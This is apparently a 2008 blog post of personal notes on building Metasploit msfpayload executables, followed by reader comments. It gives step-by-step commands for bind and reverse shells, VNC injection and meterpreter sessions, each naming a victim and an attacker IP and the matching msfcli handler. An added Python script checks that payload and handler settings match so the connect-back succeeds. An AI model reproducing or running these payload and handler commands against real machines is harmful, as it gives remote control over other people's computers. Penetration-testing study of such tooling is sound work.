Friday, October 17, 2008

Metasploit Payloads - msfpayload

This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as I get more working examples.

These payloads will be detected by AV; I will cover methods of avoiding AV detection in another post.

In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port, it will default to 4444.


1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:
run Listen-shell.exe

Hacker:
nc 192.168.1.110 2482



2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe



3. For a VNC listener on target

Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:
run Listen-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E



4. For a reverse VNC session

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:
run reverse-vnc.exe



5. For a meterpreter listener

Create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:
run met-listen.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E



6. For a reverse meterpreter connection (not working yet. not sure why)

Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 X > /tmp/met-reverse.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:
run met-reverse.exe


UPDATE: The payload for 6 should read:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 LPORT=4444 X > /tmp/met-reverse.exe
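An added check, not part of these notes or of Metasploit itself: a small Python script that reads an msfpayload line together with its msfcli handler line and reports an LPORT set on only one side, an LHOST that is not a full four-octet address (a shorthand such as 192.168.112 is accepted by inet_aton-style resolvers, but as 192.168.0.112), and any PAYLOAD/LHOST/LPORT value the two lines disagree on. It assumes the KEY=VALUE layout used in the sections above and treats a missing LPORT as 4444, as noted at the top of the post.

```python
import socket
import ipaddress

DEFAULT_LPORT = "4444"  # what msfpayload/msfcli use when LPORT is left out


def parse_opts(cmdline):
    """Pull KEY=VALUE options out of an msfpayload or msfcli line.
    Constructed for this note: it mimics the layout of the lines in this
    post and is not Metasploit's own option parser."""
    toks = cmdline.split()
    opts = {k.upper(): v for k, v in (t.split("=", 1) for t in toks if "=" in t)}
    if toks and toks[0].endswith("msfpayload") and len(toks) > 1:
        opts["PAYLOAD"] = toks[1]  # msfpayload takes the payload name positionally
    return opts


def lint(opts):
    """Warnings for one side (the generated binary or the handler)."""
    warns = []
    if "reverse" in opts.get("PAYLOAD", "") and "LHOST" not in opts:
        warns.append("missing LHOST: a reverse payload has nowhere to call back to")
    if "LPORT" not in opts:
        warns.append(f"LPORT not set, defaults to {DEFAULT_LPORT}")
    host = opts.get("LHOST")
    if host is not None:
        try:
            ipaddress.IPv4Address(host)  # strict: exactly four octets
        except ValueError:
            try:
                # inet_aton accepts shorthand such as 192.168.112 and quietly
                # reads it as 192.168.0.112, so a connect-back goes to the wrong host
                lenient = socket.inet_ntoa(socket.inet_aton(host))
                warns.append(f"LHOST {host} is not dotted-quad; inet_aton reads it as {lenient}")
            except OSError:
                warns.append(f"LHOST {host} is not an IPv4 literal (hostnames land here too)")
    return warns


def check_pair(payload_cmd, handler_cmd):
    """Lint both lines, then report PAYLOAD/LHOST/LPORT values that disagree.
    Returns [] when the binary and the handler should find each other."""
    p, h = parse_opts(payload_cmd), parse_opts(handler_cmd)
    warns = ["payload: " + w for w in lint(p)] + ["handler: " + w for w in lint(h)]
    for key in ("PAYLOAD", "LHOST", "LPORT"):
        default = DEFAULT_LPORT if key == "LPORT" else None
        pv, hv = p.get(key, default), h.get(key, default)
        if pv != hv:
            warns.append(f"{key} differs: payload={pv} handler={hv}")
    return warns
```

Call check_pair(payload_line, handler_line) with the two lines from any section above; an empty list means the binary and the handler agree on where to meet.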



This post was inspired by pauldotcom.

12 comments:

CG said...

You need to specify a port for #6.

SynJunkie said...

Cheers Chris. I'll give that a go.

overclucker said...

Well, I bet he wanted port 4444, else he would have done differently. Thank you, SynJunkie! Your work shows important MSF functionality not covered in the documentation. Perhaps you would consider making contributions to the MSF documentation. Oftentimes I come across this belief that, if you cannot figure it out for yourself, you don't deserve to figure it out at all. I say: man ain't all there . . . that is, the manual doesn't always enlighten the full functionality of a program or tool set. Forgive my Bourbon-influenced ramblings . . .

SynJunkie said...

Hi, thanks for the comment, Overclucker.

I keep meaning to update this MSF post but I didn't think it was useful to anyone but me.

Have you checked out Chris Gates' site (Carnal0wnage)? He has loads of MSF stuff that makes mine look pitiful.

Keep drunk posting man!!!

Anonymous said...

Hey,
I'm a dude in Sweden, experimenting with BT3 on my EEE. Thx for posting this stuff; it helped me with pentesting a Win2000 laptop. Couldn't find any premade Windows binary (.exe) file in BT3 that I could upload with Meterpreter to start a VNC server. Used your way and it worked like a charm. Nice blog too =)

SynJunkie said...

No probs, really glad you found this stuff useful.

Cheers

Syn

Reeth said...

Hey very useful, thank you for this!

greetings reeth

myownremote.blogspot.co

SynJunkie said...

Hey thanks, and a nice looking blog you have there.

Cheers

syn

Anonymous said...

6. For a reverse meterpreter connection (not working yet. not sure why)

your command line is missing the LPORT variable

Create payload should be:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 LPORT=4444 X > /tmp/met-reverse.exe

SynJunkie said...

I got that from Chris's comment, but cheers. I'll update the post.

Lee

Anonymous said...

Hi m8

These are more than useful notes on MSF

Thanks for the sharing, they made me understand important issues regarding the function of MSF

Keep it spinning

ratb0y

emaniacs said...

Thanks, I need your post..